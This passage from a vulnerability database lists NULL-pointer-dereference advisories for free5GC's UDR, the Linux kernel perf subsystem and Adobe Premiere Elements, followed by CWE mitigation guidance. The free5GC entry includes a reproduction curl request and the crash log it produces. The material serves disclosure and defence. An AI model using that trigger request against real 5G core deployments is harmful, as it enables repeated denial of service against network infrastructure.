 \u0027http://10.100.200.11:8000/nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions\u0027 \\\n  -H \u0027Authorization: Bearer \u003cvalid_nudr_dr_jwt\u003e\u0027\n```\n```\nHTTP/1.1 500 Internal Server Error\nContent-Length: 0\n```\n\n5. UDR container logs (`docker logs udr`) confirm the nil-pointer panic at `event_amf_subscription_info_document.go:69` inside `RemoveAmfSubscriptionsInfoProcedure`:\n```\n[ERRO][UDR][GIN] panic: runtime error: invalid memory address or nil pointer dereference\ngithub.com/free5gc/udr/internal/sbi/processor.(*Processor).RemoveAmfSubscriptionsInfoProcedure\n    .../event_amf_subscription_info_document.go:69\ngithub.com/free5gc/udr/internal/sbi.(*Server).HandleRemoveAmfSubscriptionsInfo\n    .../api_datarepository.go:2172\n[INFO][UDR][GIN] | 500 | DELETE | /nudr-dr/v2/subscription-data/x/bad/ee-subscriptions/x/amf-subscriptions |\n```\n\n### Impact\nNULL pointer dereference (CWE-476) in an authenticated UDR data-repository handler, caused by improper handling of the missing-subsId branch (CWE-754): the handler sets a problem-details value but does not return, then dereferences the same missing map entry.\n\nThis is NOT framed as an auth-bypass finding: the endpoint requires a valid `nudr-dr` OAuth2 access token. A network attacker who already holds (or can obtain) a valid token can:\n- Trigger a reliable, repeatable nil-deref panic on the `amf-subscriptions` delete route after one preparatory POST that allocates UE state for the chosen `ueId`.\n- Repeat the trigger to sustain a per-request panic-DoS on UDR\u0027s data-repository surface, with each panic costing more CPU + log writes than the intended `404 SUBSCRIPTION_NOT_FOUND` response would have.\n\nNo Confidentiality impact (the response is `500` with empty body; no UE data is returned to the attacker via the panic). No persistent Integrity impact from the panic itself (the EE subscription created during the precondition is in-memory state owned by UDR\u0027s intended data-repository semantics, and is not corrupted by the delete-time panic). Availability impact is limited to per-request degradation (Gin recovers; the UDR process keeps running).\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/919\nUpstream fix: https://github.com/free5gc/udr/pull/60",
  "id": "GHSA-4rqf-grm6-vf75",
  "modified": "2026-06-08T23:48:05Z",
  "published": "2026-05-08T22:52:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-4rqf-grm6-vf75"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44323"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/free5gc/issues/919"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/udr/pull/60"
    },
    {
      "type": "WEB",
      "url": "https://github.com/free5gc/udr/commit/8a1d3c63be99d378806d771f086ff32f1867da99"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/free5gc/free5gc"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "free5GC\u0027s UDR nudr-dr DELETE amf-subscriptions panics on missing subsId when UE state exists (nil pointer dereference)"
}

GHSA-4RRH-P933-RF74

Vulnerability from github – Published: 2026-04-03 18:31 – Updated: 2026-04-23 21:31
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

perf/x86: Move event pointer setup earlier in x86_pmu_enable()

A production AMD EPYC system crashed with a NULL pointer dereference in the PMU NMI handler:

BUG: kernel NULL pointer dereference, address: 0000000000000198 RIP: x86_perf_event_update+0xc/0xa0 Call Trace: amd_pmu_v2_handle_irq+0x1a6/0x390 perf_event_nmi_handler+0x24/0x40

The faulting instruction is cmpq $0x0, 0x198(%rdi) with RDI=0, corresponding to the if (unlikely(!hwc->event_base)) check in x86_perf_event_update() where hwc = &event->hw and event is NULL.

drgn inspection of the vmcore on CPU 106 showed a mismatch between cpuc->active_mask and cpuc->events[]:

active_mask: 0x1e (bits 1, 2, 3, 4) events[1]: 0xff1100136cbd4f38 (valid) events[2]: 0x0 (NULL, but active_mask bit 2 set) events[3]: 0xff1100076fd2cf38 (valid) events[4]: 0xff1100079e990a90 (valid)

The event that should occupy events[2] was found in event_list[2] with hw.idx=2 and hw.state=0x0, confirming x86_pmu_start() had run (which clears hw.state and sets active_mask) but events[2] was never populated.

Another event (event_list[0]) had hw.state=0x7 (STOPPED|UPTODATE|ARCH), showing it was stopped when the PMU rescheduled events, confirming the throttle-then-reschedule sequence occurred.

The root cause is commit 7e772a93eb61 ("perf/x86: Fix NULL event access and potential PEBS record loss") which moved the cpuc->events[idx] assignment out of x86_pmu_start() and into step 2 of x86_pmu_enable(), after the PERF_HES_ARCH check. This broke any path that calls pmu->start() without going through x86_pmu_enable() -- specifically the unthrottle path:

perf_adjust_freq_unthr_events() -> perf_event_unthrottle_group() -> perf_event_unthrottle() -> event->pmu->start(event, 0) -> x86_pmu_start() // sets active_mask but not events[]

The race sequence is:

  1. A group of perf events overflows, triggering group throttle via perf_event_throttle_group(). All events are stopped: active_mask bits cleared, events[] preserved (x86_pmu_stop no longer clears events[] after commit 7e772a93eb61).

  2. While still throttled (PERF_HES_STOPPED), x86_pmu_enable() runs due to other scheduling activity. Stopped events that need to move counters get PERF_HES_ARCH set and events[old_idx] cleared. In step 2 of x86_pmu_enable(), PERF_HES_ARCH causes these events to be skipped -- events[new_idx] is never set.

  3. The timer tick unthrottles the group via pmu->start(). Since commit 7e772a93eb61 removed the events[] assignment from x86_pmu_start(), active_mask[new_idx] is set but events[new_idx] remains NULL.

  4. A PMC overflow NMI fires. The handler iterates active counters, finds active_mask[2] set, reads events[2] which is NULL, and crashes dereferencing it.

Move the cpuc->events[hwc->idx] assignment in x86_pmu_enable() to before the PERF_HES_ARCH check, so that events[] is populated even for events that are not immediately started. This ensures the unthrottle path via pmu->start() always finds a valid event pointer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-23435"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-03T16:16:25Z",
    "severity": "MODERATE"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86: Move event pointer setup earlier in x86_pmu_enable()\n\nA production AMD EPYC system crashed with a NULL pointer dereference\nin the PMU NMI handler:\n\n  BUG: kernel NULL pointer dereference, address: 0000000000000198\n  RIP: x86_perf_event_update+0xc/0xa0\n  Call Trace:\n   \u003cNMI\u003e\n   amd_pmu_v2_handle_irq+0x1a6/0x390\n   perf_event_nmi_handler+0x24/0x40\n\nThe faulting instruction is `cmpq $0x0, 0x198(%rdi)` with RDI=0,\ncorresponding to the `if (unlikely(!hwc-\u003eevent_base))` check in\nx86_perf_event_update() where hwc = \u0026event-\u003ehw and event is NULL.\n\ndrgn inspection of the vmcore on CPU 106 showed a mismatch between\ncpuc-\u003eactive_mask and cpuc-\u003eevents[]:\n\n  active_mask: 0x1e (bits 1, 2, 3, 4)\n  events[1]:   0xff1100136cbd4f38  (valid)\n  events[2]:   0x0                 (NULL, but active_mask bit 2 set)\n  events[3]:   0xff1100076fd2cf38  (valid)\n  events[4]:   0xff1100079e990a90  (valid)\n\nThe event that should occupy events[2] was found in event_list[2]\nwith hw.idx=2 and hw.state=0x0, confirming x86_pmu_start() had run\n(which clears hw.state and sets active_mask) but events[2] was\nnever populated.\n\nAnother event (event_list[0]) had hw.state=0x7 (STOPPED|UPTODATE|ARCH),\nshowing it was stopped when the PMU rescheduled events, confirming the\nthrottle-then-reschedule sequence occurred.\n\nThe root cause is commit 7e772a93eb61 (\"perf/x86: Fix NULL event access\nand potential PEBS record loss\") which moved the cpuc-\u003eevents[idx]\nassignment out of x86_pmu_start() and into step 2 of x86_pmu_enable(),\nafter the PERF_HES_ARCH check. This broke any path that calls\npmu-\u003estart() without going through x86_pmu_enable() -- specifically\nthe unthrottle path:\n\n  perf_adjust_freq_unthr_events()\n    -\u003e perf_event_unthrottle_group()\n      -\u003e perf_event_unthrottle()\n        -\u003e event-\u003epmu-\u003estart(event, 0)\n          -\u003e x86_pmu_start()     // sets active_mask but not events[]\n\nThe race sequence is:\n\n  1. A group of perf events overflows, triggering group throttle via\n     perf_event_throttle_group(). All events are stopped: active_mask\n     bits cleared, events[] preserved (x86_pmu_stop no longer clears\n     events[] after commit 7e772a93eb61).\n\n  2. While still throttled (PERF_HES_STOPPED), x86_pmu_enable() runs\n     due to other scheduling activity. Stopped events that need to\n     move counters get PERF_HES_ARCH set and events[old_idx] cleared.\n     In step 2 of x86_pmu_enable(), PERF_HES_ARCH causes these events\n     to be skipped -- events[new_idx] is never set.\n\n  3. The timer tick unthrottles the group via pmu-\u003estart(). Since\n     commit 7e772a93eb61 removed the events[] assignment from\n     x86_pmu_start(), active_mask[new_idx] is set but events[new_idx]\n     remains NULL.\n\n  4. A PMC overflow NMI fires. The handler iterates active counters,\n     finds active_mask[2] set, reads events[2] which is NULL, and\n     crashes dereferencing it.\n\nMove the cpuc-\u003eevents[hwc-\u003eidx] assignment in x86_pmu_enable() to\nbefore the PERF_HES_ARCH check, so that events[] is populated even\nfor events that are not immediately started. This ensures the\nunthrottle path via pmu-\u003estart() always finds a valid event pointer.",
  "id": "GHSA-4rrh-p933-rf74",
  "modified": "2026-04-23T21:31:18Z",
  "published": "2026-04-03T18:31:21Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23435"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/886fa869153917d902784098922defa20c3a2fe5"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/8d5fae6011260de209aaf231120e8146b14bc8e0"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/c1dd1e2b722d3f1f2e4977dad8d1be78fdfb30cb"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RVP-MWVG-9858

Vulnerability from github – Published: 2022-03-17 00:00 – Updated: 2022-03-17 00:00
VLAI
Details

Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-40789"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-03-16T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.",
  "id": "GHSA-4rvp-mwvg-9858",
  "modified": "2022-03-17T00:00:32Z",
  "published": "2022-03-17T00:00:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40789"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/premiere_elements/apsb21-106.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-56
Implementation

For any pointers that could have been modified or provided from a function that can return NULL, check the pointer for NULL before use. When working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the check, and unlock when it has finished [REF-1484].

Mitigation
Requirements

Select a programming language that is not susceptible to these issues.

Mitigation
Implementation

Check the results of all functions that return a value and verify that the value is non-null before acting upon it.

Mitigation
Architecture and Design

Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.

Mitigation
Implementation

Explicitly initialize all variables and other data stores, either during declaration or just before the first usage.

No CAPEC attack patterns related to this CWE.